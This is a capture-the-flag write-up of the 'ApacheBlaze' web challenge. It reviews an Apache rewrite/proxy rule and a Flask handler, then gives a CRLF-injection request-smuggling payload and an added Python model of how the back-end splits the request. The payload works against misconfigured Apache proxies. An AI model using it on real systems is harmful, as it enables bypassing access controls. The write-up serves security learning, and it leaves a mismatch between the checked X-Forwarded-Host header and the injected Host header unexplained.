Apache Blaze
Challenge description
Step into the ApacheBlaze universe, a world of arcade clicky games. Rumor has it that by playing certain games, you have the chance to win a grand prize. However, before you can dive into the fun, you'll need to crack a puzzle.
Challenge overview
This challenge presents a web application that acts as a front-end for various arcade games. The application proxies requests to a back-end server, which hosts the games. To access the games, users must provide the game name as a query parameter.
Code Review
Apache Configuration (httpd.conf)
RewriteRule "^/api/games/(.*)" "http://127.0.0.1:8080/?game=$1" [P]
ProxyPassReverse "/" "http://127.0.0.1:8080:/api/games/"
The RewriteRule directs requests matching /api/games/(.*) to the back-end at http://127.0.0.1:8080/?game=$1, with the [P] flag handing the rewritten URL to mod_proxy so the request is proxied rather than redirected. ProxyPassReverse rewrites Location and similar headers in the back-end's responses so they point at the front-end instead of 127.0.0.1:8080.
Python Application (app.py)
    elif game == 'click_topia':
        # Access is gated on a header supplied by the proxy, not on state the back-end controls
        if request.headers.get('X-Forwarded-Host') == 'dev.apacheblaze.local':
            return jsonify({
                'message': f'{app.config["FLAG"]}'
            }), 200
        else:
            return jsonify({
                'message': 'This game is currently available only from dev.apacheblaze.local.'
            }), 200
The application checks whether the game parameter is 'click_topia' and whether the X-Forwarded-Host header equals 'dev.apacheblaze.local'. If both conditions are met, it returns a JSON response containing the flag. Note that X-Forwarded-Host is a header the proxy forwards, not a value the application derives itself, so the check depends entirely on what reaches the back-end.
Vulnerability Analysis
The vulnerability arises from the interaction between mod_rewrite and mod_proxy in Apache, which can lead to HTTP request smuggling. Specifically, the path segment captured by (.*) is percent-decoded and substituted into the proxied request without validation, so an encoded CRLF sequence becomes a real line break in the request Apache sends upstream, and the back-end misinterprets where one request ends and the next begins.
Exploitation Steps
Craft Malicious Request:
To exploit this, send a request that injects a CRLF sequence (%0d%0a) to split headers, effectively smuggling a second request:
GET /api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local%0d%0a%0d%0aGET%20/ HTTP/1.1
This payload manipulates the request such that the front-end server interprets it as a single request, while the back-end sees two separate requests.
Server Interpretation:
- Front-End: Processes the request up to the injected newline, treating it as a complete request.
- Back-End: Interprets the portion after the newline as a new request with the Host header set to dev.apacheblaze.local.
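A small model of the two-view problem described above, added here as an example and not taken from the write-up or the challenge. It performs the rewrite on the page's own payload the way the analysis describes it (capture group percent-decoded and spliced into the proxied request line) and then parses the result the way a back-end that simply reads one request after another would. It is deliberately simplified: the upstream Host value is an assumption, and where mod_proxy's own added headers land relative to the injected ones is not modelled.

```python
# Added example (not part of the original write-up): model the rewrite and show
# how a back-end parser sees two requests where the front-end saw one.
import re
from urllib.parse import unquote

REWRITE = re.compile(r"^/api/games/(.*)$")

# The request path from the write-up, exactly as the front-end receives it.
SMUGGLED_PATH = ("/api/games/click_topia%20HTTP/1.1%0d%0aHost:%20dev.apacheblaze.local"
                 "%0d%0a%0d%0aGET%20/")


def proxied_request(path: str, upstream_host: str = "127.0.0.1:8080") -> str:
    """Model the RewriteRule: decode the captured group and substitute it into
    the back-end request line. Simplified; upstream_host is an assumption."""
    m = REWRITE.match(path)
    if not m:
        raise ValueError("path does not match the rewrite rule")
    game = unquote(m.group(1))  # here %0d%0a becomes a real CRLF
    return f"GET /?game={game} HTTP/1.1\r\nHost: {upstream_host}\r\n\r\n"


def parse_requests(stream: str):
    """Split a byte stream at blank lines, as a lenient back-end would, and
    return each request's request line, headers and `game` query value."""
    requests = []
    for block in stream.split("\r\n\r\n"):
        if not block.strip():
            continue
        lines = block.split("\r\n")
        request_line = lines[0]
        headers = {}
        for h in lines[1:]:
            name, _, value = h.partition(":")
            headers[name.strip()] = value.strip()
        q = re.search(r"\?game=([^ ]*)", request_line)
        requests.append({
            "request_line": request_line,
            "headers": headers,
            "game": q.group(1) if q else None,
        })
    return requests


def backend_view(path: str):
    """What the back-end parses out of a single front-end request for `path`."""
    return parse_requests(proxied_request(path))


if __name__ == "__main__":
    for i, req in enumerate(backend_view(SMUGGLED_PATH), 1):
        print(f"request {i}: {req['request_line']!r} headers={req['headers']} game={req['game']}")
```

Running it shows the point the bullets make: a benign path such as /api/games/click_start yields one parsed request, while the payload yields two, with the client-chosen Host value sitting inside the request that carries game=click_topia. Which request the proxy's own headers attach to is exactly the ambiguity that makes front-end and back-end disagree.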
Flag Retrieval:
The back-end application, seeing the Host header as dev.apacheblaze.local and the game parameter as click_topia, returns the flag in its response:
{ "message": "HTB{f4k3_fl4g_f0r_t3st1ng}" }
With the fake flag retrieved, we can use the same technique to get the real flag on the HTB server.
ApacheBlaze has been Pwned!
Congratulations
0bytes, best of luck in capturing flags ahead!